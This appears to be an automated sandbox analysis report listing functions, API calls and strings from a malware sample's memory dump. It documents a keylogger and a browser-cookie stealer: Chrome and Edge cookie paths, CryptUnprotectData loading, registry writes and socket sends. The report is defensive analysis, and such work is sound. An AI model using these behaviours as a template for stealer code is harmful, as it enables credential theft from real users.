Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 4269425633-0
Opcode ID: 7ce0eaa0b2930da6a74499d106fb459c324b9ed2a72e41934db5320175e10e7c
Instruction ID: a0c68ada47c0804736a7b2772d1db97e9bc00546201e077e59639075b0857204
Opcode Fuzzy Hash: 7ce0eaa0b2930da6a74499d106fb459c324b9ed2a72e41934db5320175e10e7c
Instruction Fuzzy Hash: 574134311083419BC325F722DC55AEFB3A5AF94344F50493EF58A921E2EF385A4AC69A

Uniqueness

Uniqueness Score: -1.00%

Function 00443D58 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00443DCA
_free.LIBCMT ref: 00443DEA

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 8692cb65d4d6bb9cba31bc66b02b2d447c0bbfc8e4e9d82d370da2cfb380f7a9
Instruction ID: 180f8567f3436ff6df5672f1cc1a10b237692132214a9588386a8a5d626758db
Opcode Fuzzy Hash: 8692cb65d4d6bb9cba31bc66b02b2d447c0bbfc8e4e9d82d370da2cfb380f7a9
Instruction Fuzzy Hash: 1841E436A002009FDB20DF79C881A5AB7B5EF88B14F2545AEE515EB351D735AE01CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0045106D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DC4F,?,?,?,00000001,00000000,?,00000001,0042DC4F,0042DC4F), ref: 004510BA
__alloca_probe_16.LIBCMT ref: 004510F2
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DC4F,?,?,?,00000001,00000000,?,00000001,0042DC4F,0042DC4F,?), ref: 00451143
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DC4F,0042DC4F,?,00000002,00000000), ref: 00451155
__freea.LIBCMT ref: 0045115E

Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 369a9eb66afadfb6e8e840eb6335fc98255c85e757915b35f66c680b2fba1eee
Instruction ID: e5d6c08e9d18d7846db305dd98d41714dd399240760fd92c9c86a3e4aaa02a35
Opcode Fuzzy Hash: 369a9eb66afadfb6e8e840eb6335fc98255c85e757915b35f66c680b2fba1eee
Instruction Fuzzy Hash: 0F312132A0020AABDF248F65CC41EAF7BA5EF08341F05416AFD14D72A2E739CC54CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004110B1 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004110BE
int.LIBCPMT ref: 004110D1

Part of subcall function 0040E00F: std::_Lockit::_Lockit.LIBCPMT ref: 0040E020
Part of subcall function 0040E00F: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E03A

std::_Facet_Register.LIBCPMT ref: 00411111
std::_Lockit::~_Lockit.LIBCPMT ref: 0041111A
__CxxThrowException@8.LIBVCRUNTIME ref: 00411138

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID:
API String ID: 2536120697-0
Opcode ID: 9106e99cca7860a2776a2a07fde2c54a9f73ca72b70fd8621fe786bfdd0ca6ee
Instruction ID: a4b3b54c979a96992e2bd1820719d1d15e96ebfc38258379f77cf37beeb677ff
Opcode Fuzzy Hash: 9106e99cca7860a2776a2a07fde2c54a9f73ca72b70fd8621fe786bfdd0ca6ee
Instruction Fuzzy Hash: 94113A32900514A7CB14EBA5D8058DEBBB89F48324F21006FFA04A73A1DB789E81C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD2CF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00CCD2E7

Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CC7A83), ref: 00CC8967
Part of subcall function 00CC8951: GetLastError.KERNEL32(?,?,00CC7A83), ref: 00CC8979

_free.LIBCMT ref: 00CCD2F9
_free.LIBCMT ref: 00CCD30B
_free.LIBCMT ref: 00CCD31D
_free.LIBCMT ref: 00CCD32F

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f8a3a2ab4980dddfc3ded2d2fb3936f794887b50ea7218a4752db1863dc6bf1b
Instruction ID: 661d7600a50076d8fe7d7fda977e0184b5958523795b63f8e5c09ffac5bfe99a
Opcode Fuzzy Hash: f8a3a2ab4980dddfc3ded2d2fb3936f794887b50ea7218a4752db1863dc6bf1b
Instruction Fuzzy Hash: C3F0127350829577C620DF65E9CAF2A73FDAA007107680D1DF059DB691CF30FE854665

Uniqueness

Uniqueness Score: -1.00%

Function 004508FD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00450915

Part of subcall function 00446642: RtlFreeHeap.NTDLL(00000000,00000000,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?), ref: 00446658
Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A

_free.LIBCMT ref: 00450927
_free.LIBCMT ref: 00450939
_free.LIBCMT ref: 0045094B
_free.LIBCMT ref: 0045095D

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e5d56ee398bdfbfcfbbb3f4ba07dab2c02d7dab1510b0bbff9ebc0497d520251
Instruction ID: 29a0dbab307c4b395b57238b336e7f1280b31558f0d7efaeec20342ac47a58e2
Opcode Fuzzy Hash: e5d56ee398bdfbfcfbbb3f4ba07dab2c02d7dab1510b0bbff9ebc0497d520251
Instruction Fuzzy Hash: B9F0127650820067A620DB5DE8D3C1B73DDEA057117A6881BF948DB62BC738FCC0CA5C

Uniqueness

Uniqueness Score: -1.00%

Function 00443FA7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00443FC5

Part of subcall function 00446642: RtlFreeHeap.NTDLL(00000000,00000000,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?), ref: 00446658
Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A

_free.LIBCMT ref: 00443FD7
_free.LIBCMT ref: 00443FEA
_free.LIBCMT ref: 00443FFB
_free.LIBCMT ref: 0044400C

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 24d92841da83fb7def2b37d9385adf34fcb32afdec168f981d9737e382994ccf
Instruction ID: 24c1456feddea9d43312e9cc52bb540d1f60c9f15742623fd6849a2c11194e6b
Opcode Fuzzy Hash: 24d92841da83fb7def2b37d9385adf34fcb32afdec168f981d9737e382994ccf
Instruction Fuzzy Hash: DBF03AB18045208FA671AF2DBD524053B75A705760356412BF81C62A74C77949C2CFCF

Uniqueness

Uniqueness Score: -1.00%

Function 00CBD150 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 445COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 00CBD276
std::_Xinvalid_argument.LIBCPMT ref: 00CBD6F9

Strings

invalid stoi argument, xrefs: 00CBD6F4
stoi argument out of range, xrefs: 00CBD6EA

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: PathTempXinvalid_argumentstd::_
String ID: invalid stoi argument$stoi argument out of range
API String ID: 3948722134-1606216832
Opcode ID: 92b9a09f904c48884e550168ed9f99165cb0b610315655fb13ca24f4ebf0e214
Instruction ID: 594c6ef5d334150bcb3d83ecc074882896602587aec63805f1cb7af14f8510d4
Opcode Fuzzy Hash: 92b9a09f904c48884e550168ed9f99165cb0b610315655fb13ca24f4ebf0e214
Instruction Fuzzy Hash: 2AE115716001485BDF18EF38CD8ABED7B3AAF42344F544618F806876D7EB39DA858792

Uniqueness

Uniqueness Score: -1.00%

Function 00CCB99C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CCBB36

Strings

*?, xrefs: 00CCB9DF

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: b361ef44cc374e74a2f9710f9a014aa24532be247253f3c282e872c8b8542774
Instruction ID: e7514e84bd23bae6fa9768825e37cd913a495a1e8153538b57ef323cd696b15a
Opcode Fuzzy Hash: b361ef44cc374e74a2f9710f9a014aa24532be247253f3c282e872c8b8542774
Instruction Fuzzy Hash: 04610A75D002199FCB14DFA9C882AEEBBF5EF48310F24816EE855E7340D731AE419B90

Uniqueness

Uniqueness Score: -1.00%

Function 0044E5A9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044E5F8
_free.LIBCMT ref: 0044E715

Part of subcall function 0043BC59: IsProcessorFeaturePresent.KERNEL32(00000017,0043BC2B,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BC4B,00000000,00000000,00000000,00000000,00000000), ref: 0043BC5B
Part of subcall function 0043BC59: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BC7D
Part of subcall function 0043BC59: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BC84

Strings

., xrefs: 0044E8CC
*?, xrefs: 0044E5EC

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 953ade1eaee2fe91f1041e702ec1c097f3b8de92aef54e7f0a6f9603ef5a3565
Instruction ID: 5c43e14eb4c3d169d765f7cc1b0ac18bd00b2d083d68f891a18fbf6c96fdc733
Opcode Fuzzy Hash: 953ade1eaee2fe91f1041e702ec1c097f3b8de92aef54e7f0a6f9603ef5a3565
Instruction Fuzzy Hash: 1E51C171E00209AFEF14CFAAC841AAEFBB5FF58314F25416EE454E7301E6399A018B54

Uniqueness

Uniqueness Score: -1.00%

Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32 ref: 00409ED3

Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0

Part of subcall function 0041C463: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C478

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

PG, xrefs: 00409EFE
XQG, xrefs: 00409F48
NG, xrefs: 00409F33

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CreateFileKeyboardLayoutNameconnectsend
String ID: XQG$NG$PG
API String ID: 1634807452-3565412412
Opcode ID: b1d5e324ed03b6578331472fa442b6ee2ff11952c6f207c71cda26659455ef7c
Instruction ID: 54e7b2e3c22fc6d4453642fd245f9e0f365eb47252e0afba34a901821bea4d9f
Opcode Fuzzy Hash: b1d5e324ed03b6578331472fa442b6ee2ff11952c6f207c71cda26659455ef7c
Instruction Fuzzy Hash: E65131315082415AC328F732D851AEFB3E5AFD4348F50493FF44AA71E2EF78594AC649

Uniqueness

Uniqueness Score: -1.00%

Function 00443394 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\yaALNupJCH.exe,00000104), ref: 004433D4
_free.LIBCMT ref: 0044349F
_free.LIBCMT ref: 004434A9

Strings

C:\Users\user\Desktop\yaALNupJCH.exe, xrefs: 004433CB, 004433D2, 00443401, 00443439

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\yaALNupJCH.exe
API String ID: 2506810119-3763621502
Opcode ID: 0ecbe3507a193e65cd04cb6d0317a175991b1ee18462a5fe729ee2095615c7ff
Instruction ID: d495169aa647f9283a7fc5678286d5ac447c1d80eb523621169543331939c4ae
Opcode Fuzzy Hash: 0ecbe3507a193e65cd04cb6d0317a175991b1ee18462a5fe729ee2095615c7ff
Instruction Fuzzy Hash: B1319571900258BFEB22DF9ADC819DFBBACEB85715F10406BF80497211D6788F81CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066

Part of subcall function 0041B8C6: GetCurrentProcessId.KERNEL32(00000000,7782FBB0,00000000,?,?,?,?,00466468,0040D15B,.vbs,?,?,?,?,?,004752F0), ref: 0041B8ED

Part of subcall function 004184B6: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 004184CC
Part of subcall function 004184B6: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 004184D5

Part of subcall function 0041C3D3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A791), ref: 0041C3EC

Sleep.KERNEL32(000000FA,00465E74), ref: 00404138

Strings

0NG, xrefs: 00404097
/sort "Visit Time" /stext ", xrefs: 004040B2

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "$0NG
API String ID: 368326130-3219657780
Opcode ID: 55c07a66b7ce3422725bd62898cf5c4168b4a854fda8ec30082a2f041c2aeaea
Instruction ID: 2723665aff0001c8eb0dcc99e8f292f7fea15a2d2b61d2442ed78a1fc6e7b378
Opcode Fuzzy Hash: 55c07a66b7ce3422725bd62898cf5c4168b4a854fda8ec30082a2f041c2aeaea
Instruction Fuzzy Hash: 58316371A0011956CB15FBA2DC969EE7375AF90308F40007FF206B71E2EF785D89CA99

Uniqueness

Uniqueness Score: -1.00%

Function 00416232 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00416243

Part of subcall function 004137C5: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 004137D3
Part of subcall function 004137C5: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C0A0,00466C48,00000001,000000AF,004660A4), ref: 004137EE
Part of subcall function 004137C5: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C0A0,00466C48,00000001,000000AF,004660A4), ref: 004137F9

Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD

Strings

PG, xrefs: 00416270
!D@, xrefs: 00416FD7
okmode, xrefs: 0041625D

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _wcslen$CloseCreateValue
String ID: !D@$okmode$PG
API String ID: 3411444782-3370592832
Opcode ID: a3f8e80e59589597bb37adf7a2eb6fe0668d100f7b0ae421da322d026006e22d
Instruction ID: 70b78272a37c925ffc2bbf27fe81a39eb2a1877854726b2372d6ef4cdaa99610
Opcode Fuzzy Hash: a3f8e80e59589597bb37adf7a2eb6fe0668d100f7b0ae421da322d026006e22d
Instruction Fuzzy Hash: 7B119371B442011ADA187732E872BBD22969F80358F80443FF546AF2E2DEBD4C41574D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C53A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C411: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C444

PathFileExistsW.SHLWAPI(00000000), ref: 0040C56B
PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C5D6

Strings

User Data\Profile ?\Network\Cookies, xrefs: 0040C583
User Data\Default\Network\Cookies, xrefs: 0040C551

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: 26efd94af6ac9a76e426a57642c2894b1e6e74959b2217a34813010acf864e26
Instruction ID: 0d3671945d163f179dfc74684fa7d60980301dcab59faebae93cfb08f5644a4c
Opcode Fuzzy Hash: 26efd94af6ac9a76e426a57642c2894b1e6e74959b2217a34813010acf864e26
Instruction Fuzzy Hash: 5C21D37190011ADACB05F7A2DC96CEEB778AE50719B40053FB502B21E2EF78994AC698

Uniqueness

Uniqueness Score: -1.00%

Function 0040C609 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C474: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C4A7

PathFileExistsW.SHLWAPI(00000000), ref: 0040C63A
PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6A5

Strings

User Data\Profile ?\Network\Cookies, xrefs: 0040C652
User Data\Default\Network\Cookies, xrefs: 0040C620

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: 96fc8233489dcc89bd1bce5ebc1090edb6563cce250ead7e360cea783d414e94
Instruction ID: cd3ac36060f6dd10227e635323ce9c221b0d05fe1f22e326eaff4c9839abebb3
Opcode Fuzzy Hash: 96fc8233489dcc89bd1bce5ebc1090edb6563cce250ead7e360cea783d414e94
Instruction Fuzzy Hash: AC21127190011ADACB14F7A2DC96CEEB778BE50719B40053FB502B31E2EF789946C698

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE3C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B0B2: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B0C0
Part of subcall function 0040B0B2: wsprintfW.USER32 ref: 0040B141

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AEBC
CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AEC8
CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AED4

Strings

Online Keylogger Started, xrefs: 0040AE51, 0040AE5A, 0040AE84

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: b284bcf6be9b409c0051a55f077d609e247e1bba3d490e58f0437d83e9f8f86c
Instruction ID: 35c8ad9330cbabd9a84998b0057f5e9cb1d3334ac0cbf96acddd5b3bbbfc58cf
Opcode Fuzzy Hash: b284bcf6be9b409c0051a55f077d609e247e1bba3d490e58f0437d83e9f8f86c
Instruction Fuzzy Hash: 8101C4A06003183AE62072369C8ADBF7E6DCA81398F4004BFF645226C2D9BD1C5586FB

Uniqueness

Uniqueness Score: -1.00%

Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
GetProcAddress.KERNEL32(00000000), ref: 00406A89

Strings

crypt32, xrefs: 00406A7D
CryptUnprotectData, xrefs: 00406A78

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32
API String ID: 2574300362-2380590389
Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
CloseHandle.KERNEL32(?), ref: 004051CA
SetEvent.KERNEL32(?), ref: 004051D9

Strings

Connection Timeout, xrefs: 00405198

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 57fd12feec5ca518750c611f0d7dbff0e6bed28cc8204c5ee9b0e51f71af0d5f
Instruction ID: 818ba9a903718bf70962d64877cf58bd49af678424aac798fcc48c71b6ebc0a3
Opcode Fuzzy Hash: 57fd12feec5ca518750c611f0d7dbff0e6bed28cc8204c5ee9b0e51f71af0d5f
Instruction Fuzzy Hash: 3A01D831A40F40AFD7256B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E781

Strings

ios_base::failbit set, xrefs: 0040E763
ios_base::eofbit set, xrefs: 0040E770
ios_base::badbit set, xrefs: 0040E73D

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: a9684c954ee5891e16e1afd8ae54deca4c215751209217719e990971aa723dd1
Instruction ID: 4562612ed5f23909e08b48de68f8a24239844f145e408ccd9de78b4a74cc907a
Opcode Fuzzy Hash: a9684c954ee5891e16e1afd8ae54deca4c215751209217719e990971aa723dd1
Instruction Fuzzy Hash: 7101D6719443087AD734EA93CC13FBA33585B20708F648C6BBD01762C2EA7D6961C66E

Uniqueness

Uniqueness Score: -1.00%

Function 00413762 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041376D
RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F771,pth_unenc,004752D8), ref: 0041379B
RegCloseKey.ADVAPI32(004752D8,?,0040F771,pth_unenc,004752D8), ref: 004137A6

Strings

pth_unenc, xrefs: 00413766

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: 2463f78341ac585a3f535ee31d782d803e40a1c038e044ab0fd1c259522c864a
Instruction ID: 39ca638f3a556dbd65d2a0e86665551851d0ba55163acdd2be93936ebda2a735
Opcode Fuzzy Hash: 2463f78341ac585a3f535ee31d782d803e40a1c038e044ab0fd1c259522c864a
